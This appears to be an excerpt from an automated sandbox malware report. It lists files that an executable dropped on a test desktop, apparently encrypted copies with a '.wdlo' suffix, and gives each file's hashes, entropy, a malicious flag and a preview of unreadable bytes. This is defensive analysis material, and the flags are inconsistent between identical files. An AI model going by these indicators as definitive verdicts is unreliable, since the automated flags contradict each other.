                  Preview:LFOPO..[.....p.....]...a...I.1.c..lVX9...0<.d.e... .{.Z..A........A'.h...2...c..T...@A..v...J.......I.V.O.B.H..X..H..y"..@...Z...Nce.....H.|ZnZ.Vi..K.j.p..>......N.VQC..0......#\....../.o.R......7G...tqO.:.?..gb8"|.....8...w.#+...Ks2h|.....J.K..#ml....OTRJ$M....6..1v.I..T^Q..w.......n....3.-....d....D.......@...b....G.......<SB9.},..6..... ...6...?eeg...D.........."!..~..[hFh...RI..n.fx.t.z...z....o..u..... ~r..w....y...`..h.S........N..}..l+.\/4..\.`..[.ya\.z"Nc-.;tm..5T.[j.q/wt.J4.....z;..n...,r.a...$.R..,...,..KJ.kgD.<.."z..B.,.:....\.....5|.....].Z'..|`...q....8...&.l.N..9....."..\c....+.A......h..0..A7m..>1...\./JT]..>..g..X68...#O.4.@.={$.....3#{..`...+.$.ao.9V<b.^...^+...t.a.Qp."......XBd.N..G.k..z0.-1..F).i........ .?JcUC&.ab.......a..?..._.0.d..@8..O[.......>....P.V....ii.Xl.1a{.q..E.o@....1..N.._..o.R.gxd...F6..2....RI?....l.._&%...r.1...(.b..-...+.(...j....~.4..6n!....>v*.)DT...'.....Qm1......M.\....Qp..(..:AQ.....G.U.9x..3.

                  C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8731169064154765
                  Encrypted:false
                  SSDEEP:24:Sj9cnFt3ld/n2aDyB3aHWlreXPiSSR1wG/Gv8ykJ82mi18GrxVhQtFXQypU5Dr2G:OCnF5ld/2c28zGrO8ykO2B8Kx7QtFXQV
                  MD5:1B774BE5CDB1BCC885A10A8C9ABA1B1F
                  SHA1:46502002982046662AED3F7EF12CB67877655292
                  SHA-256:501524D3776A9970CA159ABDEAFCF50AB15C062B2CFC76ED8EB63979B0C2C977
                  SHA-512:57C2EC88B03F7E92AB5263ED456E69418808125FF78D14C358D32A2D99B4481592E6135B824512620256AD80471FCB32989D86A7F52159E085312966E9EC814A
                  Malicious:false
                  Preview:LFOPO..[.....p.....]...a...I.1.c..lVX9...0<.d.e... .{.Z..A........A'.h...2...c..T...@A..v...J.......I.V.O.B.H..X..H..y"..@...Z...Nce.....H.|ZnZ.Vi..K.j.p..>......N.VQC..0......#\....../.o.R......7G...tqO.:.?..gb8"|.....8...w.#+...Ks2h|.....J.K..#ml....OTRJ$M....6..1v.I..T^Q..w.......n....3.-....d....D.......@...b....G.......<SB9.},..6..... ...6...?eeg...D.........."!..~..[hFh...RI..n.fx.t.z...z....o..u..... ~r..w....y...`..h.S........N..}..l+.\/4..\.`..[.ya\.z"Nc-.;tm..5T.[j.q/wt.J4.....z;..n...,r.a...$.R..,...,..KJ.kgD.<.."z..B.,.:....\.....5|.....].Z'..|`...q....8...&.l.N..9....."..\c....+.A......h..0..A7m..>1...\./JT]..>..g..X68...#O.4.@.={$.....3#{..`...+.$.ao.9V<b.^...^+...t.a.Qp."......XBd.N..G.k..z0.-1..F).i........ .?JcUC&.ab.......a..?..._.0.d..@8..O[.......>....P.V....ii.Xl.1a{.q..E.o@....1..N.._..o.R.gxd...F6..2....RI?....l.._&%...r.1...(.b..-...+.(...j....~.4..6n!....>v*.)DT...'.....Qm1......M.\....Qp..(..:AQ.....G.U.9x..3.

                  C:\Users\user\Desktop\LFOPODGVOH\NIRMEKAMZH.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850687020638702
                  Encrypted:false
                  SSDEEP:24:uKqZg9+ziBw2nTsnEnia8Waz8cs/7RR6FoxbqOvoAPyAqDi/Q9JfWlzRB3zbD:jyKwITqXDKdRMoEOvoAqA4i/p1RB3nD
                  MD5:2150905E7909FCCD8B6193F20455CAFC
                  SHA1:069EBBD57605FC91791F32CC0FC6F32094321E49
                  SHA-256:C1B6A751B6E1E7DF04F8657C8B5F1EAC18E7A71D449614626C62BF85EC229CA9
                  SHA-512:B3D7FF3C0388538E2C8C9A11FF02B61EE7151FF1332D490409A070AEC07ECFC32543A0EECF8F774DE9DDABD2419BCDE9C10128D65113B47F39DF15E0E3E8740C
                  Malicious:false
                  Preview:NIRME....[.b..?......%}.NU.I".VP....E*...A.H...)V......2.....>........0.`4...xa"a..nSf..J..G..rRB.S.....t..3....*>(....gQ..9..zy.F#4..U-.q...c.|.-.?4..P)@..&.......\...i...}...6]..%q..F....M[........]/M;./.(.....-..."...w.<..p..1.6...!..Y..J._.{..x ..#....x?.\+$.A........O.}.....%....)p.>..)...E=>...2...<<.&.5P.B...ah..-.iH[.....I.UI...S..2..>V......W....b;.2.Vg>).......|/....p,.5.7.$.B..g.Xt..j.7.........t.....\P...(...Tq...!.fQ...7.J........_&w..`W.is.1.+.>.....i..#......,C..qr..A.\(.._..]|..x...*..hy.~.W......la_.U..J.D,..\..2.g`..3.6+..f...M@#......Y4.~sH<.?s..?.]V.rr.A6...r......1..2.-....I`.uPX^...$.L#.3A.&..&.....{...ont....l....^-...k...%...,.....Hl...C.}c..@_.v.....vu.bk.r....q.j.x....D([@&..Z(.m...@..{_.....g[...=j#...?[.m.2J<E.&C...f&+...,9.+i.}..KF..=.Q..I..&.n{......_{.%X.=.....8.G..r."..t.[..Z!.-.&?&3.\..2.!q..u^LS:(...L..[...b....uh...vC22.H..........S.N.x....9*.;.a....c.rx......^..F..Q.../.{C"o.....2...."..R...

                  C:\Users\user\Desktop\LFOPODGVOH\NIRMEKAMZH.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850687020638702
                  Encrypted:false
                  SSDEEP:24:uKqZg9+ziBw2nTsnEnia8Waz8cs/7RR6FoxbqOvoAPyAqDi/Q9JfWlzRB3zbD:jyKwITqXDKdRMoEOvoAqA4i/p1RB3nD
                  MD5:2150905E7909FCCD8B6193F20455CAFC
                  SHA1:069EBBD57605FC91791F32CC0FC6F32094321E49
                  SHA-256:C1B6A751B6E1E7DF04F8657C8B5F1EAC18E7A71D449614626C62BF85EC229CA9
                  SHA-512:B3D7FF3C0388538E2C8C9A11FF02B61EE7151FF1332D490409A070AEC07ECFC32543A0EECF8F774DE9DDABD2419BCDE9C10128D65113B47F39DF15E0E3E8740C
                  Malicious:false
                  Preview:NIRME....[.b..?......%}.NU.I".VP....E*...A.H...)V......2.....>........0.`4...xa"a..nSf..J..G..rRB.S.....t..3....*>(....gQ..9..zy.F#4..U-.q...c.|.-.?4..P)@..&.......\...i...}...6]..%q..F....M[........]/M;./.(.....-..."...w.<..p..1.6...!..Y..J._.{..x ..#....x?.\+$.A........O.}.....%....)p.>..)...E=>...2...<<.&.5P.B...ah..-.iH[.....I.UI...S..2..>V......W....b;.2.Vg>).......|/....p,.5.7.$.B..g.Xt..j.7.........t.....\P...(...Tq...!.fQ...7.J........_&w..`W.is.1.+.>.....i..#......,C..qr..A.\(.._..]|..x...*..hy.~.W......la_.U..J.D,..\..2.g`..3.6+..f...M@#......Y4.~sH<.?s..?.]V.rr.A6...r......1..2.-....I`.uPX^...$.L#.3A.&..&.....{...ont....l....^-...k...%...,.....Hl...C.}c..@_.v.....vu.bk.r....q.j.x....D([@&..Z(.m...@..{_.....g[...=j#...?[.m.2J<E.&C...f&+...,9.+i.}..KF..=.Q..I..&.n{......_{.%X.=.....8.G..r."..t.[..Z!.-.&?&3.\..2.!q..u^LS:(...L..[...b....uh...vC22.H..........S.N.x....9*.;.a....c.rx......^..F..Q.../.{C"o.....2...."..R...

                  C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852258133478099
                  Encrypted:false
                  SSDEEP:24:Pn8Iwj/8FX0YuB4JvASi9R0PThSan8xAXKsb8X3zbD:k7jkFL77EREtD/W3nD
                  MD5:05047A1C06C58957F2377BE04C403448
                  SHA1:B75CDFA0E27DE1CFB58DBD2F549F3D0AF8D1D797
                  SHA-256:CF46E2B51DC5B5E211058211566C3912C69972036412BF4920AA9E15E49CC8FE
                  SHA-512:CEAD122D6C692A0F2C5EA289E368FBF669CFE5FB815EFF3F053AB38CC36B82F2EF68A032EFB79EBFF8EC524F4679143329D245E422663FAA8D6C5CEB39D4990D
                  Malicious:false
                  Preview:QFAPO.&C..`....;...[d ...?.Q...o...K.T.....j.l....M..... .o.F:.O......%..=...z?2..v.........R... >..m.@.......!..Th.L.+H...S}.F.. .4.|.53/.&>(v...\^...Y......0.O.*m.Fq.W.a.s#....r..~&:j.........h..n..~O.0.,.v......K...N]..E..$.>.<)_f7.L%..._.(Q..\K...].D.O...A...~.^........g.......Y......0A....U.:..S.=z...OJ.9 .R..!7..V.r..<.(............xE..}.(..D....)...^.5.i. ....4`...0.8.`..a.[.!..[,.E}..U.d......=.s=...\"..`)....?.:.o8.N.#...1,.`v.8...BO...v.+..n~....V...l.Z..w5[6..w..R.|...l...o.O .f.W3[..~X.S......T.x......f...o....+......h....v.n..y.W.x.....o._d.Q....&.......A..n....1E.b.ukT.S.U\.&a.Y.^I...zx....o.r.e....t.l"....)k,.../..u.i....Ijb.w...D..?q.H.9.f...tU...n.....I...n...H..F......m`.&.....Rz.m..^...:........O.....:....u...G......@..i....Wh.".z..S..4.".r1.h:r..Y....9.Z..j.vojW..=.......|q...:6....u.:.s.:C.M.S! .fU~y.....j]4.{..3.h..y9.}..p..).....X....C.Ct.......*.Y..;.......c.*V%.P.L..]t1..+.G."...y.g..].w.3.T`.L.....v*.>*..3..@..

                  C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852258133478099
                  Encrypted:false
                  SSDEEP:24:Pn8Iwj/8FX0YuB4JvASi9R0PThSan8xAXKsb8X3zbD:k7jkFL77EREtD/W3nD
                  MD5:05047A1C06C58957F2377BE04C403448
                  SHA1:B75CDFA0E27DE1CFB58DBD2F549F3D0AF8D1D797
                  SHA-256:CF46E2B51DC5B5E211058211566C3912C69972036412BF4920AA9E15E49CC8FE
                  SHA-512:CEAD122D6C692A0F2C5EA289E368FBF669CFE5FB815EFF3F053AB38CC36B82F2EF68A032EFB79EBFF8EC524F4679143329D245E422663FAA8D6C5CEB39D4990D
                  Malicious:false
                  Preview:QFAPO.&C..`....;...[d ...?.Q...o...K.T.....j.l....M..... .o.F:.O......%..=...z?2..v.........R... >..m.@.......!..Th.L.+H...S}.F.. .4.|.53/.&>(v...\^...Y......0.O.*m.Fq.W.a.s#....r..~&:j.........h..n..~O.0.,.v......K...N]..E..$.>.<)_f7.L%..._.(Q..\K...].D.O...A...~.^........g.......Y......0A....U.:..S.=z...OJ.9 .R..!7..V.r..<.(............xE..}.(..D....)...^.5.i. ....4`...0.8.`..a.[.!..[,.E}..U.d......=.s=...\"..`)....?.:.o8.N.#...1,.`v.8...BO...v.+..n~....V...l.Z..w5[6..w..R.|...l...o.O .f.W3[..~X.S......T.x......f...o....+......h....v.n..y.W.x.....o._d.Q....&.......A..n....1E.b.ukT.S.U\.&a.Y.^I...zx....o.r.e....t.l"....)k,.../..u.i....Ijb.w...D..?q.H.9.f...tU...n.....I...n...H..F......m`.&.....Rz.m..^...:........O.....:....u...G......@..i....Wh.".z..S..4.".r1.h:r..Y....9.Z..j.vojW..=.......|q...:6....u.:.s.:C.M.S! .fU~y.....j]4.{..3.h..y9.}..p..).....X....C.Ct.......*.Y..;.......c.*V%.P.L..]t1..+.G."...y.g..].w.3.T`.L.....v*.>*..3..@..

                  C:\Users\user\Desktop\LIJDSFKJZG.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849722910770006
                  Encrypted:false
                  SSDEEP:24:cL2nEzy0el/S25O79VPE9Hm2ZfrmwneakWsUDXQKtIcInPpHK3zbD:cLmmY/15sXEJm29+apXWnxK3nD
                  MD5:605F9383906FB4172CAF621FA5B02248
                  SHA1:4B05323F2EA5537128F495C39747CC74BCCA588B
                  SHA-256:CE8C266E839C0E9C977E393D310F213BEC6C309EBF15F142ADB971581D7D72A7
                  SHA-512:0E887A7739BB467FDE673E418EB3665CAB1121C05D56B9607EFB332C9FEDC3BBADB6EBAC078368A8FD72309B2DE71701028BE1567E8309E7618BC15352A3CBA6
                  Malicious:false
                  Preview:LIJDS.w.h....e...;...L..d.w^b...M........W...h.$... B.A E..OP..\\..f1+.\.z.]...@....:..YF....8..-...(..@W.Y.S:.......t...E.....R.....M..... S@.%.<..1....t>e.....d.k*6I.-.?nAG......|.q:s.......[N.z..dS....z........Y#Q<Q.bT#...`..M=......x...u.*(.../......?.#k?..\m.X..._.-f....#.....w..^....*[.\..=J{'T.[rH.82...\.*h.(._..e.Tr3..J.$W..tq.$.f.........;../I..m.IdV,.\.T.W.8....).E.J.,bE.X....Ikk.......q..D.....+..U..T\DO...`.)..@..g..9..g..8&..'_...=.IT.[........v!.....-\IT.!..).F$.HD&)y..(t.......'.......S.......U......m...~(..3.65=...z.k...He8........Vi.u..B.N..-......y~.V.q..DV........g..Y....L.R8.R;.|.R.......B..k':.bs.w...s..e..t"...mm.i..kn.N.K.0$TY.D......o.mY.o.x.:{...._....F9..aM....P4'*..@.<._..E.%....8...u....W.......9v...~.~?.....h.Y.f.Q-..|.^..6.f63.|).f>Mg:..:&&..w.j..]....d.V....z!6...G3..w...=....d...:.t#c.G.....t..)..g.Px..@..~..i;...+.}.^Eiu[=2b....S..62!.u..1...~.^....r.GAm....Q..jN....N...Z?i.7BVP.....^..qKc.9c)..U

                  C:\Users\user\Desktop\LIJDSFKJZG.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849722910770006
                  Encrypted:false
                  SSDEEP:24:cL2nEzy0el/S25O79VPE9Hm2ZfrmwneakWsUDXQKtIcInPpHK3zbD:cLmmY/15sXEJm29+apXWnxK3nD
                  MD5:605F9383906FB4172CAF621FA5B02248
                  SHA1:4B05323F2EA5537128F495C39747CC74BCCA588B
                  SHA-256:CE8C266E839C0E9C977E393D310F213BEC6C309EBF15F142ADB971581D7D72A7
                  SHA-512:0E887A7739BB467FDE673E418EB3665CAB1121C05D56B9607EFB332C9FEDC3BBADB6EBAC078368A8FD72309B2DE71701028BE1567E8309E7618BC15352A3CBA6
                  Malicious:false
                  Preview:LIJDS.w.h....e...;...L..d.w^b...M........W...h.$... B.A E..OP..\\..f1+.\.z.]...@....:..YF....8..-...(..@W.Y.S:.......t...E.....R.....M..... S@.%.<..1....t>e.....d.k*6I.-.?nAG......|.q:s.......[N.z..dS....z........Y#Q<Q.bT#...`..M=......x...u.*(.../......?.#k?..\m.X..._.-f....#.....w..^....*[.\..=J{'T.[rH.82...\.*h.(._..e.Tr3..J.$W..tq.$.f.........;../I..m.IdV,.\.T.W.8....).E.J.,bE.X....Ikk.......q..D.....+..U..T\DO...`.)..@..g..9..g..8&..'_...=.IT.[........v!.....-\IT.!..).F$.HD&)y..(t.......'.......S.......U......m...~(..3.65=...z.k...He8........Vi.u..B.N..-......y~.V.q..DV........g..Y....L.R8.R;.|.R.......B..k':.bs.w...s..e..t"...mm.i..kn.N.K.0$TY.D......o.mY.o.x.:{...._....F9..aM....P4'*..@.<._..E.%....8...u....W.......9v...~.~?.....h.Y.f.Q-..|.^..6.f63.|).f>Mg:..:&&..w.j..]....d.V....z!6...G3..w...=....d...:.t#c.G.....t..)..g.Px..@..~..i;...+.}.^Eiu[=2b....S..62!.u..1...~.^....r.GAm....Q..jN....N...Z?i.7BVP.....^..qKc.9c)..U

                  C:\Users\user\Desktop\LIJDSFKJZG.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.855453237217533
                  Encrypted:false
                  SSDEEP:24:uHeP3Kajpf32C1D3B26nY5vvRKhvTDlJVA/WccBE0Sf4Lc8M4hTI/UVlEbTkqChB:uHkK+pf32IBLnCvOUcqfsC41IRbTC3nD
                  MD5:7B52FA8851BFA8C9D35164F51E28B3BF
                  SHA1:4598A07F9944D8C6E76242739986DD789223A61F
                  SHA-256:82A9567E95895D86BD153FA84F18DAB13FC06084B54A5C6CE73F156BBC444630
                  SHA-512:F03DE8EE7FB4E16CFC792C07095947024607E5750ED600180195837AF3B7D3AEBD038760A8F9DC01D1712CDE76F771834BD1907E6B19273156E2F067EF2E0DD5
                  Malicious:false
                  Preview:LIJDS./......*>.C..L3?~.......c.1.(`..t...uA..A........##...X.(.4^...Y@.[..L.Gk..$..6...o.....S^..BE.....i...-......kY.\.O.Y.......V...?O.CU`,...owV.....i...z..$.3.w...]]<.v......(.x....T.,..p......L]J!.....9..[Y..K.7.[.#..E..L.q...;.+tL......(.....T|.........1..b 9.n..........R.^.[.r.-.W....*....S.lQ3......sV.....s..C]...w.z~_'.8r..k..f......fW..j$..P....-m..V.+V.;.e........a+...|-y.QZ......B&...0y..R...0..w4......7....~;...V..|.Ul.].".>....!.Z..JXHw.... l.Vs..\|...P.;.e..J......+]?.......8{/E..q...v.DzA..y.8..._x....y9 .zp.W.x.FC.9.P.\.4.#....`..^(.....k......Z. ..hE.Z.3.Mvz...6zY:f.:M..E\s....&..a..T.._v..m'\.MB.n.w.....d[..+..9]$.. ...c&....<q*I.H.<...i...v/{.<..3.".^..~./.R...=..SF......A:..U...r..Vr..I.....L.t...+6>....Q...u.a...+......tA)]..I/...;...h....?/..]..X..."....._M3.).3)......?.F.S...z.Y.^c.A...^.....rVE.E.........s...l|...o.*.G.m,...N87.............nR.p...Q..........y.._...A.i>. .S...6..@..:/T9a....Y..f..-..L.......e.b...

                  C:\Users\user\Desktop\LIJDSFKJZG.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.855453237217533
                  Encrypted:false
                  SSDEEP:24:uHeP3Kajpf32C1D3B26nY5vvRKhvTDlJVA/WccBE0Sf4Lc8M4hTI/UVlEbTkqChB:uHkK+pf32IBLnCvOUcqfsC41IRbTC3nD
                  MD5:7B52FA8851BFA8C9D35164F51E28B3BF
                  SHA1:4598A07F9944D8C6E76242739986DD789223A61F
                  SHA-256:82A9567E95895D86BD153FA84F18DAB13FC06084B54A5C6CE73F156BBC444630
                  SHA-512:F03DE8EE7FB4E16CFC792C07095947024607E5750ED600180195837AF3B7D3AEBD038760A8F9DC01D1712CDE76F771834BD1907E6B19273156E2F067EF2E0DD5
                  Malicious:false
                  Preview:LIJDS./......*>.C..L3?~.......c.1.(`..t...uA..A........##...X.(.4^...Y@.[..L.Gk..$..6...o.....S^..BE.....i...-......kY.\.O.Y.......V...?O.CU`,...owV.....i...z..$.3.w...]]<.v......(.x....T.,..p......L]J!.....9..[Y..K.7.[.#..E..L.q...;.+tL......(.....T|.........1..b 9.n..........R.^.[.r.-.W....*....S.lQ3......sV.....s..C]...w.z~_'.8r..k..f......fW..j$..P....-m..V.+V.;.e........a+...|-y.QZ......B&...0y..R...0..w4......7....~;...V..|.Ul.].".>....!.Z..JXHw.... l.Vs..\|...P.;.e..J......+]?.......8{/E..q...v.DzA..y.8..._x....y9 .zp.W.x.FC.9.P.\.4.#....`..^(.....k......Z. ..hE.Z.3.Mvz...6zY:f.:M..E\s....&..a..T.._v..m'\.MB.n.w.....d[..+..9]$.. ...c&....<q*I.H.<...i...v/{.<..3.".^..~./.R...=..SF......A:..U...r..Vr..I.....L.t...+6>....Q...u.a...+......tA)]..I/...;...h....?/..]..X..."....._M3.).3)......?.F.S...z.Y.^c.A...^.....rVE.E.........s...l|...o.*.G.m,...N87.............nR.p...Q..........y.._...A.i>. .S...6..@..:/T9a....Y..f..-..L.......e.b...

                  C:\Users\user\Desktop\LIJDSFKJZG.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856399985716204
                  Encrypted:false
                  SSDEEP:24:vXZ+SKalEeyt9diKwMXOES2hhMHqmRgzCSlZtfV2nnWXHvojZbsVYCt3zbD:vXL6RtwxES2hhALsCSlZtN2WQhsP3nD
                  MD5:C66A4987A34D0A0C1487837952881CDD
                  SHA1:4EAC6500A3860F94315C7881DC60014463DDCB7F
                  SHA-256:4EF4E4DEC5C24FC5157B1FEA16B93D64EF8DF1C9C59A3390E99D3A4DF6E68821
                  SHA-512:8035DE047B269243469877D694499831CD86B0EBE5338B59BB247A12A93F8D9FAD6F778669D4C42261A927AF45918D3286C78AF58FD3DE5680E995CB19782C4F
                  Malicious:true
                  Preview:LIJDS.!I{o.W.Jn.y..).w.a.....n...U*^...&..Pa.`.~..0..A......h.E..#..J.M....O.S-...wC..4..C.@..r......p`......-!}..2K.{.Pk..9.0Sv....f.?F..X.< .E....pDYGZ..~.{u.d.`.%..r?....s6C..._...g..99&........*w9..&.5.g..\e..`M..GH..K..LW..I..K{.....V.. J.On...L.&c.V...#.JX.f.d..K..Y.NTC|G=K.d./....".<......\.f.8..@.....,...B..lb.i.kNk...Y`....nb.....%.m....1,S..Z.....g.........^..c..+..E.K?......L.D......W./.(.8.-. ._........l.d+..A. .D...(./..2.5..cp&Go.D..hG.LY0....i@.Gr.G..F..i..J..B..e..9..8n88l....BM...Q`.r..T......H..3..[.O..-:Z1,.%|0.......;5..#.2.U..@N.G....x3.m..;.Wf....3.....s.}..3...T..d.-a.[Jt..c..=.7.T.o.S.2..t].,F..r.4"(4.8T....h..=R.0.D.6s.8..W.1.C.V...d.f..~qJ.#dv..F..=.<.&....".tsG......|s.IQ...a..@.L,1|)....O8j.O.qH.....5Xtx.l..B&6.. ..}.^...11w.E....?.1..t...s.`.>. ...M..z.!..9...D?..^=.v.K.....\..O..1.l.1.Y...2}.p.P>3Z....{..D....IdQb7....pP...'.R..={..{b.X..'.x@..x..6"...]..G'.g]..7`.cY'f.f.......>.s.....DUS .{.\K..>PX.AS.......Y.?.

                  C:\Users\user\Desktop\LIJDSFKJZG.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.856399985716204
                  Encrypted:false
                  SSDEEP:24:vXZ+SKalEeyt9diKwMXOES2hhMHqmRgzCSlZtfV2nnWXHvojZbsVYCt3zbD:vXL6RtwxES2hhALsCSlZtN2WQhsP3nD
                  MD5:C66A4987A34D0A0C1487837952881CDD
                  SHA1:4EAC6500A3860F94315C7881DC60014463DDCB7F
                  SHA-256:4EF4E4DEC5C24FC5157B1FEA16B93D64EF8DF1C9C59A3390E99D3A4DF6E68821
                  SHA-512:8035DE047B269243469877D694499831CD86B0EBE5338B59BB247A12A93F8D9FAD6F778669D4C42261A927AF45918D3286C78AF58FD3DE5680E995CB19782C4F
                  Malicious:false
                  Preview:LIJDS.!I{o.W.Jn.y..).w.a.....n...U*^...&..Pa.`.~..0..A......h.E..#..J.M....O.S-...wC..4..C.@..r......p`......-!}..2K.{.Pk..9.0Sv....f.?F..X.< .E....pDYGZ..~.{u.d.`.%..r?....s6C..._...g..99&........*w9..&.5.g..\e..`M..GH..K..LW..I..K{.....V.. J.On...L.&c.V...#.JX.f.d..K..Y.NTC|G=K.d./....".<......\.f.8..@.....,...B..lb.i.kNk...Y`....nb.....%.m....1,S..Z.....g.........^..c..+..E.K?......L.D......W./.(.8.-. ._........l.d+..A. .D...(./..2.5..cp&Go.D..hG.LY0....i@.Gr.G..F..i..J..B..e..9..8n88l....BM...Q`.r..T......H..3..[.O..-:Z1,.%|0.......;5..#.2.U..@N.G....x3.m..;.Wf....3.....s.}..3...T..d.-a.[Jt..c..=.7.T.o.S.2..t].,F..r.4"(4.8T....h..=R.0.D.6s.8..W.1.C.V...d.f..~qJ.#dv..F..=.<.&....".tsG......|s.IQ...a..@.L,1|)....O8j.O.qH.....5Xtx.l..B&6.. ..}.^...11w.E....?.1..t...s.`.>. ...M..z.!..9...D?..^=.v.K.....\..O..1.l.1.Y...2}.p.P>3Z....{..D....IdQb7....pP...'.R..={..{b.X..'.x@..x..6"...]..G'.g]..7`.cY'f.f.......>.s.....DUS .{.\K..>PX.AS.......Y.?.

                  C:\Users\user\Desktop\LIJDSFKJZG\BWDRWEEARI.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858982781947322
                  Encrypted:false
                  SSDEEP:24:HLEZrJNDy4uixQn6v0hDzYnEzgzRRs/Duz96uYZxjhTOQ1nNCxPREslOXSc3vx3D:rGrJNtQ40Gtk7Z51nNCV6mOB3nD
                  MD5:A4E36EE797BE733F1D58896A96812C21
                  SHA1:39865180AB2F52C4FF2471F7D4FE175378F50EA2
                  SHA-256:033B78218EDFFCF2C87AD0622B02A3155F23CBDE7F83CE09E3BA4EDCEC612F6F
                  SHA-512:9096C406EFA0211F32CBDA73E35DBD57085255D9F545357329CDE9241C61B02CACEBBF81C0FFB629C6DEF3728938F37473855D6205BAFFB81B1CC443A49DEAF7
                  Malicious:false
                  Preview:BWDRW...H...<.X/...+),-S..#.Q...............qa.....1.<I\..........h=...I..}d&8.......m.?..}@V-...g!5n...H\f........h...k..?P......<u.......*....&A7.R..@. ..8.(P.<u..@.3.CX./S|.~Ic?6..K.)#.N.o.....G.e....]h..2.S5.{.[.s.../I.6.:..QJ.. wz.:$....+.....0.e.....&S.qN........ V:..^\,..Q1^...-.....W(...;.......j.G...K.=.L.Wy....?UBd.MQX.. `.x....B....!x...>$...q......1^..LJ....!.._.:Q*.b..2....E4(.r\.\...Gi.).....!........1."f'...<....Yo/.....6.>z.5)d<j..6...$..T..v......mL..]t..|....'....[D)d..!....c..,f.5...,R.U..%~.......=.2..MD.....g...].........r.|..1.Z@..Gp..n..+...."...w..B.z....#.l......v.=.".....C.K.........tS^.+.........3e...8.P...qU.....Z........B.,..1...&&.L....N..%X($.nE..m!.3.F...jMO...F..p-.*..r.n:.`..SEB|hIe3.Sls*..H.J).(....&.K...............y...........b...0.u}ii.o...n..#...1....N.....9...Yx.Vf.....E..'...\.....7.+Iv..kO....Z..A..R..k".G.$..*...Nb.C....<./).T.`.F.*LG~.}._.O.e...<.*...)l.].....p.<.rAH-l$q..Bt.Vosl...q..tm@.(*.....<s.......t

                  C:\Users\user\Desktop\LIJDSFKJZG\BWDRWEEARI.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858982781947322
                  Encrypted:false
                  SSDEEP:24:HLEZrJNDy4uixQn6v0hDzYnEzgzRRs/Duz96uYZxjhTOQ1nNCxPREslOXSc3vx3D:rGrJNtQ40Gtk7Z51nNCV6mOB3nD
                  MD5:A4E36EE797BE733F1D58896A96812C21
                  SHA1:39865180AB2F52C4FF2471F7D4FE175378F50EA2
                  SHA-256:033B78218EDFFCF2C87AD0622B02A3155F23CBDE7F83CE09E3BA4EDCEC612F6F
                  SHA-512:9096C406EFA0211F32CBDA73E35DBD57085255D9F545357329CDE9241C61B02CACEBBF81C0FFB629C6DEF3728938F37473855D6205BAFFB81B1CC443A49DEAF7
                  Malicious:false
